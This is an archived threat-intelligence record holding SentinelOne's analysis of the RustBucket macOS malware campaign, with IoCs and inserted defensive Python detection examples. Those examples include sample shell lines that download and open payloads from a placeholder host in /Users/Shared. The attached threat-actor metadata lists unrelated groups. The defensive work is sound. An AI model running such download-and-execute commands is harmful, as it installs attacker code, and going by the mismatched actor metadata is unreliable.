{
	"id": "411897d0-3a1d-47e0-9ba1-4ef9f6a1af69",
	"created_at": "2026-04-06T00:12:18.055651Z",
	"updated_at": "2026-04-10T03:35:51.270526Z",
	"deleted_at": null,
	"sha1_hash": "be5f16a4a1558170bdd5877bfc221097ec6d1fe6",
	"title": "BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6973286,
	"plain_text": "BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade\r\nAnalysis and Detection\r\nBy Phil Stokes\r\nPublished: 2023-07-05 · Archived: 2026-04-05 21:23:31 UTC\r\nBack in April, researchers at JAMF detailed a sophisticated APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on\r\ninfected devices. ‘RustBucket’, as they labeled it, was attributed with strong confidence to the BlueNoroff APT,\r\ngenerally assumed to be a subsidiary of the wider DPRK cyber attack group known as Lazarus.\r\nIn May, ESET tweeted details of a second RustBucket variant targeting macOS users, followed in June by\r\nElastic’s discovery of a third variant that included previously unseen persistence capabilities.\r\nRustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages\r\nof the malware. In this post, we review the multiple malware payloads used in the campaign and highlight the\r\nnovel techniques RustBucket deploys to evade analysis and detection.\r\nRustBucket Stage 1 | AppleScript Dropper\r\nThe attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled\r\nAppleScript that is saved in a .app format. 
Unlike regular macOS applications, Applets typically lack a user\r\ninterface and function merely as a convenient way for developers to distribute AppleScripts to users.\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 1 of 11\n\nThe threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the built-in osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).\r\nStage 1 executes three ‘do shell script’ commands to set up Stage 2\r\nThe script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called Internal PDF Viewer. We will forgo the details here as researchers have previously described this in detail.\r\nStage 1 writes the second stage to the /Users/Shared/ folder, which is world-writable, requires no elevated privileges and is not protected by TCC, so malware can write and execute there without triggering a consent prompt. The Stage 1 variant described by Elastic differs in that it writes the second stage as a hidden file to /Users/Shared/.pd.\r\nStage 1 is easily the least sophisticated and most easily detected part of the attack chain. Each do shell script command is passed to /bin/sh -c, so its full argument string should appear in the Mac’s unified logs and in the output of command line tools such as the ps utility.\r\nSuccess of Stage 1 relies heavily on how well the threat actor employs social engineering tactics. In the case described by JAMF, the threat actors used an elaborate ruse of requiring an “internal” PDF reader to read a supposedly confidential or ‘protected’ document. Victims were required to execute Stage 1 believing it to be capable of reading the PDF they had received. 
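Added example: the Stage 1 detection point above, turned into a process-telemetry check. This is not code from the SentinelOne post; it is illustrative Python that models a snapshot of ps output, walks the parent chain and flags sh -c children of an AppleScript applet that download into /Users/Shared and unpack or execute what they fetched. The process rows, the applet path, the placeholder URL and the scoring weights are all constructed for this example.

```python
# Added example (not code from the SentinelOne post): a process-telemetry
# heuristic for the Stage 1 pattern. AppleScript's 'do shell script'
# executes its command via /bin/sh -c, so an applet dropper shows up as
# sh children of the applet process with the full command line visible
# to ps and to the unified log. The process rows and the applet path
# below are constructed for this example; the scoring weights and the
# threshold are this example's own choices.
from dataclasses import dataclass

STAGING_DIRS = ('/Users/Shared/', '/users/shared/')  # lowercase form also seen in RustBucket
FETCH_TOOLS = ('curl ', 'wget ', 'nscurl ')
EXEC_HINTS = ('unzip ', 'open ', 'chmod ', 'xattr ', 'osascript ')
FLAG_THRESHOLD = 3

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str   # executable path, as in 'ps -o comm'
    args: str   # full command line, as in 'ps -o args'

def basename(path):
    return path.rsplit('/', 1)[-1]

def is_shell_c(p):
    # do shell script spawns /bin/sh -c <command>
    return basename(p.comm) in ('sh', 'bash', 'zsh') and ' -c ' in p.args

def has_applet_ancestor(p, by_pid, max_depth=8):
    # Walk up the parent chain looking for a compiled-AppleScript applet
    # (executable named 'applet' inside a .app bundle) or osascript.
    cur = p
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return False
        name = basename(parent.comm)
        if name == 'applet' or name == 'osascript':
            return True
        cur = parent
    return False

def score_process(p, by_pid):
    reasons = []
    if has_applet_ancestor(p, by_pid):
        reasons.append('spawned by AppleScript applet/osascript')
    if any(t in p.args for t in FETCH_TOOLS) and 'http' in p.args:
        reasons.append('downloads from a URL')
    if any(d in p.args for d in STAGING_DIRS):
        reasons.append('touches /Users/Shared staging directory')
    if any(h in p.args for h in EXEC_HINTS):
        reasons.append('unpacks or executes a payload')
    # The applet-parent signal is weighted higher than the others.
    score = sum(2 if r.startswith('spawned') else 1 for r in reasons)
    return score, reasons

def find_applet_droppers(procs):
    # Returns [(pid, score, reasons)] for sh -c children that look like
    # a do-shell-script download-and-execute chain.
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        if not is_shell_c(p):
            continue
        score, reasons = score_process(p, by_pid)
        if score >= FLAG_THRESHOLD:
            hits.append((p.pid, score, reasons))
    return sorted(hits)

# Constructed sample snapshot (pid, ppid, comm, args); the applet path and
# the URLs are placeholders, not indicators from the post.
APPLET = '/Users/victim/Downloads/PDF Viewer.app/Contents/MacOS/applet'
SAMPLE_PROCS = [
    Proc(1, 0, '/sbin/launchd', '/sbin/launchd'),
    Proc(740, 1, APPLET, APPLET),
    Proc(742, 740, '/bin/sh', '/bin/sh -c curl -o /Users/Shared/1.zip https://example.invalid/1.zip'),
    Proc(743, 740, '/bin/sh', '/bin/sh -c unzip -o /Users/Shared/1.zip -d /Users/Shared/'),
    Proc(744, 740, '/bin/sh', '/bin/sh -c open /Users/Shared/Internal PDF Viewer.app'),
    Proc(880, 1, '/Applications/iTerm.app/Contents/MacOS/iTerm2', '/Applications/iTerm.app/Contents/MacOS/iTerm2'),
    Proc(901, 880, '/bin/sh', '/bin/sh -c ls /Users/Shared/'),
    Proc(940, 1, '/usr/local/bin/brew', '/usr/local/bin/brew update'),
    Proc(950, 940, '/bin/sh', '/bin/sh -c curl -sO https://example.invalid/x.zip'),
]

if __name__ == '__main__':
    for pid, score, reasons in find_applet_droppers(SAMPLE_PROCS):
        print(pid, score, '; '.join(reasons))
```

On a live Mac the same rows come from ps -axo pid,ppid,comm,args or from a unified-log stream filtered for process execution. The heuristic is deliberately generous, since an applet spawning a downloader is rare enough to review by hand, and the lowercase /users/shared form is included because the post notes that case sloppiness in the samples.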
In fact, Stage 1 was only a dropper, with Stage 2 gated behind the malicious PDF so that it would not run for anyone who stumbled on it without that document.\r\nRustBucket Stage 2 | Payloads Written in Swift and Objective-C\r\nWe have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both compiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary. The universal ‘fat’ binaries range between 160KB and 210KB.\r\nSamples of RustBucket Stage 2 vary in size\r\nAcross the samples, various username strings can be found. Those we have observed in Stage 2 binaries so far include:\r\n/Users/carey/\r\n/Users/eric/\r\n/Users/henrypatel/\r\n/Users/hero/\r\nDespite the differences in size and code artifacts, the Stage 2 payloads have in common the task of retrieving the Stage 3 from the command and control server. Stage 2 will not proceed on its own: it requires the specially-crafted PDF sent to the victim, which both unlocks the code path that downloads Stage 3 and supplies the XOR key used to decode the obfuscated C2 address appended to the end of the PDF.\r\nIn some variants, this data is executed in the downAndExecute function as described by previous researchers; in others, we note that download of the next stage is performed in the aptly-named down_update_run function. This function itself varies across samples. 
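Added example, not code from the post: the Stage 2 pairing described above relies on data appended to the lure PDF, an XOR key and an obfuscated C2 string. The post does not specify the trailer layout, key length or C2 encoding, so the layout below (a 4-byte big-endian key length, the key bytes, then the XOR-encoded C2, all placed after the final %%EOF) is an assumption chosen for illustration, as are the minimal PDF, the key and the placeholder C2. The general part, locating the bytes a PDF reader ignores after the last %%EOF and XOR-decoding them with a repeating key, is what an analyst would adapt to a real sample.

```python
# Added example (not code from the SentinelOne post): extracting and
# decoding a C2 string appended after a PDF's final %%EOF, the general
# technique behind the Stage 2 'key' PDF. The post does not give the
# exact trailer layout or key format; the layout here (4-byte big-endian
# key length, key bytes, XOR-encoded payload) is an assumption for
# illustration, as are the sample PDF, key and placeholder C2.
import struct

EOF_MARKER = b'%%EOF'
NL = bytes([0x0a])

def split_pdf_trailer(data):
    # Return (pdf_body, appended_bytes). Everything after the last
    # %%EOF marker (plus its trailing line ending) is treated as appended.
    idx = data.rfind(EOF_MARKER)
    if idx < 0:
        raise ValueError('not a PDF: no %%EOF marker')
    end = idx + len(EOF_MARKER)
    while end < len(data) and data[end] in (0x0d, 0x0a):
        end += 1
    return data[:end], data[end:]

def xor_bytes(buf, key):
    # Repeating-key XOR; applying it twice with the same key is the identity.
    if not key:
        raise ValueError('empty XOR key')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))

def decode_appended_c2(data):
    # Parse the assumed trailer layout and recover the C2 string.
    # Returns None for an ordinary PDF with nothing appended.
    _, blob = split_pdf_trailer(data)
    if len(blob) < 4:
        return None
    (key_len,) = struct.unpack('>I', blob[:4])
    if key_len == 0 or 4 + key_len > len(blob):
        raise ValueError('malformed trailer')
    key = blob[4:4 + key_len]
    encoded = blob[4 + key_len:]
    return xor_bytes(encoded, key).decode('utf-8')

def encode_appended_c2(pdf, c2, key):
    # Inverse of decode_appended_c2, used here only to build test input.
    blob = struct.pack('>I', len(key)) + key + xor_bytes(c2.encode('utf-8'), key)
    return pdf + blob

# Constructed minimal PDF, key and placeholder C2 (not indicators from the post).
MINIMAL_PDF = NL.join([
    b'%PDF-1.4',
    b'1 0 obj << /Type /Catalog >> endobj',
    b'trailer << /Root 1 0 R >>',
    b'%%EOF',
]) + NL
SAMPLE_KEY = bytes.fromhex('5a3c9e1b')
SAMPLE_C2 = 'https://c2.example.invalid/update'
SAMPLE_LURE = encode_appended_c2(MINIMAL_PDF, SAMPLE_C2, SAMPLE_KEY)

if __name__ == '__main__':
    body, blob = split_pdf_trailer(SAMPLE_LURE)
    print(len(body), 'PDF bytes,', len(blob), 'appended bytes')
    print('recovered C2:', decode_appended_c2(SAMPLE_LURE))
```

The rfind on %%EOF is the weak spot: XOR-encoded bytes can contain that marker by chance, so a production parser should follow the startxref/xref chain to locate the true end of the document instead of searching backwards from the end of the file.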
In b02922869e86ad06ff6380e8ec0be8db38f5002b, for example, it runs a hardcoded command via system(). Like do shell script in Stage 1, system() hands its argument to /bin/sh -c, so this variant also exposes its full command line in process telemetry.\r\nStage 2 executes a shell command via the system() call to retrieve and run Stage 3\r\nHowever, the same function in other samples (e.g., d5971e8a3e8577dbb6f5a9aad248c842a33e7a26) uses NSURL APIs and entirely different logic.\r\nCode varies widely among samples, possibly suggesting different developers\r\nResearchers at Elastic noted, further, that in one newer variant of Stage 2 written in Swift, the User-Agent string is all lowercase, whereas in the earlier Objective-C samples it is not.\r\nUser-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2\r\nHTTP header names are case-insensitive, but the User-Agent value is an opaque string that a server is free to compare byte-for-byte. If this was a deliberate change, it is possible the threat actors are matching the User-Agent string on the server side to weed out unwanted calls to the C2. That said, sloppiness around case-sensitivity is seen elsewhere in RustBucket samples (e.g., “/users/shared” in Stage 1), and the case variance may be no more than a product of different developers with different standards of rigor.\r\nIn the most recent samples, the payload retrieved by Stage 2 is written to disk as “ErrorCheck.zip” in _CS_DARWIN_USER_TEMP (aka $TMPDIR, typically at /var/folders/…/../T/) before being executed on the victim’s device.\r\nRustBucket Stage 3 | New Variant Drops Persistence LaunchAgent\r\nThe Stage 3 payload has so far been seen in two distinct variants:\r\nA: 182760cbe11fa0316abfb8b7b00b63f83159f5aa Stage3\r\nB: b74702c9b82f23ebf76805f1853bc72236bee57c ErrorCheck, System Update\r\nBoth variants are Mach-O universal binaries compiled from Rust source code. 
Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both.\r\nNotably, variant B does away with the webT class seen in variant A for gathering environmental information and checking for execution in a virtual machine by querying the SPHardwareDataType section of system_profiler output.\r\nThe webT class appears in variant A of the Stage 3 payload\r\nHowever, variant B has not scrubbed all webT artifacts from the code, and a reference to the missing module can still be found in the strings:\r\n18070 0x0032bdf4 0x10032bdf4 136 137 ascii /Users/carey/Dev/MAC_DATA/MAC/Trojan/webT/target/x86_64-apple-darwin/release/deps/updator-7a0\r\nA string referencing the missing webT module can still be found in Stage 3 variant B\r\nThe substring “Trojan”, which does not appear in earlier variants, is also found in the file path referenced by the same string.\r\nImportantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update, which serves as the target executable of the LaunchAgent. An Apple-branded label in a per-user LaunchAgents folder and a program path under ~/Library/Metadata are both unusual enough to be worth alerting on in their own right.\r\nSince Stage 3 requires a URL as a launch parameter, this is provided in the property list as a ProgramArguments entry. 
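Added example, not the post's own code: a LaunchAgent triage routine for the persistence pattern described above. It parses a property list with plistlib and reports generic red flags: an Apple-branded label sitting in a per-user LaunchAgents folder, a program outside the usual system and application paths (in particular under ~/Library/Metadata), a URL passed as a launch argument, and RunAtLoad combined with KeepAlive. The plist contents, the home directory and the argument URL are constructed for the example; the post does not reproduce the malware's plist, only the paths it uses.

```python
# Added example (not code from the SentinelOne post): triage of per-user
# LaunchAgents for the persistence pattern described in the text. The
# checks are generic and the plist contents below are constructed with
# real launchd keys; the malware's exact plist is not reproduced in the
# post, so treat the sample as an illustration. HOME is a placeholder.
import plistlib

HOME = '/Users/victim'
APPLE_LABEL_PREFIX = 'com.apple.'
TRUSTED_PROGRAM_PREFIXES = ('/System/', '/usr/', '/bin/', '/sbin/', '/Applications/', '/Library/Apple/')

def expand(path):
    # Expand a leading ~ to HOME (launchd itself does no such expansion).
    return path.replace('~', HOME, 1) if path.startswith('~') else path

def program_of(plist):
    # launchd accepts either Program or ProgramArguments[0].
    if 'Program' in plist:
        return plist['Program']
    args = plist.get('ProgramArguments') or []
    return args[0] if args else None

def triage_launch_agent(raw, path):
    # Returns a list of reasons this agent looks suspicious (empty = clean).
    plist = plistlib.loads(raw)
    reasons = []
    label = plist.get('Label', '')
    in_user_agents = expand(path).startswith(HOME + '/Library/LaunchAgents/')
    if in_user_agents and label.startswith(APPLE_LABEL_PREFIX):
        reasons.append('Apple-style label in per-user LaunchAgents')
    prog = program_of(plist)
    if prog is None:
        reasons.append('no Program/ProgramArguments')
    else:
        p = expand(prog)
        if not p.startswith(TRUSTED_PROGRAM_PREFIXES):
            reasons.append('program outside system/application paths: ' + prog)
        if p.startswith(HOME + '/Library/Metadata/'):
            reasons.append('program hidden under ~/Library/Metadata')
    for arg in (plist.get('ProgramArguments') or [])[1:]:
        if arg.startswith(('http://', 'https://')):
            reasons.append('URL passed as launch argument: ' + arg)
    if plist.get('RunAtLoad') and plist.get('KeepAlive'):
        reasons.append('RunAtLoad + KeepAlive')
    return reasons

# Constructed samples. The agent name and program path follow the post's
# IoCs; the argument URL is a placeholder.
SUSPICIOUS_PATH = '~/Library/LaunchAgents/com.apple.systemupdate.plist'
SUSPICIOUS_PLIST = plistlib.dumps({
    'Label': 'com.apple.systemupdate',
    'ProgramArguments': [HOME + '/Library/Metadata/System Update', 'https://c2.example.invalid/'],
    'RunAtLoad': True,
    'KeepAlive': True,
})
BENIGN_PATH = '~/Library/LaunchAgents/com.example.backup.plist'
BENIGN_PLIST = plistlib.dumps({
    'Label': 'com.example.backup',
    'ProgramArguments': ['/Applications/Backup.app/Contents/MacOS/backup-agent', '--quiet'],
    'RunAtLoad': True,
})

if __name__ == '__main__':
    for path, raw in ((SUSPICIOUS_PATH, SUSPICIOUS_PLIST), (BENIGN_PATH, BENIGN_PLIST)):
        print(path, triage_launch_agent(raw, path) or ['clean'])
```

The same routine works unchanged on binary plists, since plistlib.loads detects the format, and a fleet sweep would simply feed it every file under each user's ~/Library/LaunchAgents. The trusted-prefix list is intentionally short; tune it to the software actually deployed rather than widening it until the check goes quiet.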
Curiously, the URL passed to ErrorCheck on launch is appended to this hardcoded URL in the LaunchAgent plist.\r\nRustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch\r\nAppending the supplied \u003curl\u003e value to the hardcoded URL can be clearly seen in the code, though whether this is an error or accounted for in the way the string is parsed by the binary we have yet to determine.\r\nMuch of the malware functionality found in variant A’s webT methods is, in variant B, buried in the massive sym.updator::main function. This is responsible for surveilling the environment and parsing the arguments received at launch, processing commands, gathering disk information and more. This function is over 22KB and contains 501 basic blocks. Our analysis of this is ongoing, but aside from the functions previously described by Elastic, this function also gathers disk information, including whether the host device’s disk is an SSD or the older, rotational platter type.\r\nAmong updator::main’s many tasks is gathering disk information\r\nAfter gathering environmental information, the malware calls sym.updator::send_request to post the data to the C2 using the following User-Agent string (this time not in lowercase):\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\nThe malware compares the response against two hardcoded values, 0x31 and 0x30 (the ASCII characters ‘1’ and ‘0’), i.e. a single-byte yes/no from the operator.\r\nChecking the values of the response from the C2\r\nIn the sample analyzed by Elastic, the researchers reported that 0x31 causes the malware to self-terminate while 0x30 allows the operator to drop a further payload in the _CS_DARWIN_USER_TEMP directory.\r\nThe choice of Rust and the complexity 
of the Stage 3 binaries suggest the threat actor was willing to invest considerable effort to thwart analysis of the payload. As the known C2s were unresponsive by the time we conducted our analysis, we were unable to obtain a sample of the next stage of the malware, but already at this point in the operation the malware has gathered a great deal of host information, enabled persistence and opened up a backdoor for further malicious activity.\r\nSentinelOne Protects Against RustBucket Malware\r\nSentinelOne Singularity protects customers from known components of the RustBucket malware. Attempts to install persistence mechanisms on macOS devices are also dynamically detected and blocked by the agent.\r\nSentinelOne Agent User Interface\r\nSentinelOne Singularity Console\r\nConclusion\r\nThe RustBucket campaign highlights that the threat actor, whom previous researchers have confidently attributed to DPRK’s BlueNoroff APT, has invested considerable resources in multi-stage malware aimed specifically at macOS users and is evolving its attempts to thwart analysis by security researchers.\r\nThe extensive effort made to evade analysis and detection in itself shows the threat actor is aware of the growing adoption of security software by organizations with macOS devices in their fleets, as security teams have increasingly begun to see the need for better protection than provided out-of-the-box. 
SentinelOne continues to\r\ntrack the RustBucket campaign and our analysis of the known payloads is ongoing.\r\nTo see how SentinelOne can help safeguard your organization’s macOS devices, contact us for more information\r\nor request a free demo.\r\nIndicators of Compromise\r\nStage 2 Mach-Os\r\nSHA1 Arch Lang\r\n0df7e1d3b3d54336d986574441778c827ff84bf2 FAT objc\r\n27b101707b958139c32388eb4fd79fcd133ed880 ARM objc\r\n338af1d91b846f2238d5a518f951050f90693488 ARM objc\r\n5304031dc990790a26184b05b3019b2c5fa7022a FAT swift\r\n72167ec09d62cdfb04698c3f96a6131dceb24a9c ARM objc\r\n7f9694b46227a8ebc67745e533bc0c5f38fdfa59 ARM objc\r\n963a86aab1e450b03d51628797572fe9da8410a2 FAT objc\r\n9676f0758c8e8d0e0d203c75b922bcd0aeaa0873 FAT objc\r\na7f5bf893efa3f6b489efe24195c05ff87585fe3 ARM swift\r\nac08406818bbf4fe24ea04bfd72f747c89174bdb x86 objc\r\nacf1b5b47789badb519ff60dc93afa9e43bbb376 x86 swift\r\nb02922869e86ad06ff6380e8ec0be8db38f5002b x86 objc\r\nd5971e8a3e8577dbb6f5a9aad248c842a33e7a26 x86 objc\r\ne0e42ac374443500c236721341612865cd3d1eec FAT objc\r\ne275deb68cdff336cb4175819a09dbaf0e1b68f6 FAT swift\r\ned4f16b36bc47a701814b63e30d8ea7a226ca906 FAT swift\r\nfd1cef5abe3e0c275671916a1f3a566f13489416 x86 objc\r\nStage 3 Version A Mach-Os\r\nSHA1 Arch Lang\r\n182760cbe11fa0316abfb8b7b00b63f83159f5aa FAT rust\r\n3cc19cef767dee93588525c74fe9c1f1bf6f8007 ARM rust\r\n831dc7bc4a234907d94a889bcb60b7bedf1a1e13 x86 rust\r\n8e7b4a0d9a73ec891edf5b2839602ccab4af5bdf x86 rust\r\nStage 3 Version B Mach-Os\r\nSHA1 Arch Lang\r\n14165777bc48b49eb1fa9ad8fe3cb553565c26c2 FAT rust\r\n69f24956fb75beb9b93ef974d873914500e35601 ARM rust\r\n8a1b32ab8c2a889985e530425ae00f4428c575cc FAT rust\r\n8f7da0348001461fc5a1da99b89c571050de0aff x86 rust\r\na973d201c23b68c5d25ba8447b04f090c20bf6d4 ARM rust\r\nb74702c9b82f23ebf76805f1853bc72236bee57c FAT 
rust\r\ncd8f41b91e8f1d8625e076f0a161e46e32c62bbf x86 rust\r\nMalicious PDFs\r\nSHA1 Name\r\n469236d0054a270e117a2621f70f2a494e7fb823 DOJ Report on Bizlato Investigation.pdf\r\n574bbb76ef147b95dfdf11069aaaa90df968e542 Readme.pdf\r\n7e69cb4f9c37fad13de85e91b5a05a816d14f490 InvestmentStrategy(Protected).pdf\r\n7f8f43326f1ce505a8cd9f469a2ded81fa5c81be Jump Crypto Investment Agreement.pdf\r\nbe234cb6819039d6a1d3b1a205b9f74b6935bbcc DOJ Report on Bizlato Investigation_asistant.pdf\r\ne7158bb75adf27262ec3b0f2ca73c802a6222379 Daiwa Ventures.pdf\r\nStage 1 Applications (.zip)\r\n0738687206a88ecbee176e05e0518effa4ca4166\r\n0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be\r\n5933f1a20117d48985b60b10b5e42416ac00e018\r\n7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa\r\n7e1870a5b24c78a5e357568969aae3a5e7ab857d\r\n89301dfdc5361f1650796fecdac30b7d86c65122\r\n9121509d674091ce1f5f30e9a372b5dcf9bcd257\r\n9a5f6a641cc170435f52c6a759709a62ad5757c7\r\na1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0\r\nca59874172660e6180af2815c3a42c85169aa0b2\r\nd9f1392fb7ed010a0ecc4f819782c179efde9687\r\ne2bcdfbda85c55a4d6070c18723ba4adb7631807\r\nAppleScript main.scpt\r\ndabb4372050264f389b8adcf239366860662ac52\r\nCommunications\r\ncloud[.]dnx.capital\r\ncrypto.hondchain[.]com.\r\nFile Paths\r\n$TMPDIR/ErrorCheck.zip\r\n/Users/Shared/1.zip\r\n/Users/Shared/Internal PDF Viewer.app\r\n/Users/Shared/.pd\r\n~/Library/Metadata/System Update\r\n~/Library/LaunchAgents/com.apple.systemupdate.plist\r\nSource: https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/"
	],
	"report_names": [
		"bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection"
	],
	"threat_actors": [
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cfdd35af-bd12-4c03-8737-08fca638346d",
			"created_at": "2022-10-25T16:07:24.165595Z",
			"updated_at": "2026-04-10T02:00:04.887031Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Cosmic Wolf",
				"Marbled Dust",
				"Silicon",
				"Teal Kurma",
				"UNC1326"
			],
			"source_name": "ETDA:Sea Turtle",
			"tools": [
				"Drupalgeddon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "33ae2a40-02cd-4dba-8461-d0a50e75578b",
			"created_at": "2023-01-06T13:46:38.947314Z",
			"updated_at": "2026-04-10T02:00:03.155091Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"UNC1326",
				"COSMIC WOLF",
				"Marbled Dust",
				"SILICON",
				"Teal Kurma"
			],
			"source_name": "MISPGALAXY:Sea Turtle",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "62b1b01f-168d-42db-afa1-29d794abc25f",
			"created_at": "2025-04-23T02:00:55.22426Z",
			"updated_at": "2026-04-10T02:00:05.358041Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Sea Turtle",
				"Teal Kurma",
				"Marbled Dust",
				"Cosmic Wolf",
				"SILICON"
			],
			"source_name": "MITRE:Sea Turtle",
			"tools": [
				"SnappyTCP"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434338,
	"ts_updated_at": 1775792151,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/be5f16a4a1558170bdd5877bfc221097ec6d1fe6.pdf",
		"text": "https://archive.orkl.eu/be5f16a4a1558170bdd5877bfc221097ec6d1fe6.txt",
		"img": "https://archive.orkl.eu/be5f16a4a1558170bdd5877bfc221097ec6d1fe6.jpg"
	}
}